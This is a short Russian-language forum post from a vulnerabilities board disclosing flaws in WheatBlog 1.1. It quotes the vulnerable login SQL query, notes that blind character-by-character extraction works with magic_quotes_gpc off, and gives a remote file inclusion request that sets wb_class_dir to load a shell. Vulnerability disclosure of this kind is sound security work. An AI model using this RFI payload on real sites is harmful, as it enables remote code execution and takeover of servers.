WheatBlog 1.1 RFI/SQL Injection

Discussion in 'Уязвимости' started by gemaglabin, 30 Jun 2007.

  1. gemaglabin

    gemaglabin Green member

    Joined:
    1 Aug 2006
    Messages:
    772
    Likes Received:
    842
    Reputations:
    1,369
    SQL иньекция в функции логина , но под чужим аккаунтом не залезть.Возможен посимвольный перебор при условии что magic_quotes_gpc = off

    Code:
    $sql = "select * from $tblUsers where login = '$login'";
    if ( $login	 != $row['login'] )	$valid_user = 0;
    		if ( $password  != $row['password'] ) $valid_user = 0;
    
    RFI
    Code:
    includes/sessions.php?wb_class_dir=shell?
     
    2 people like this.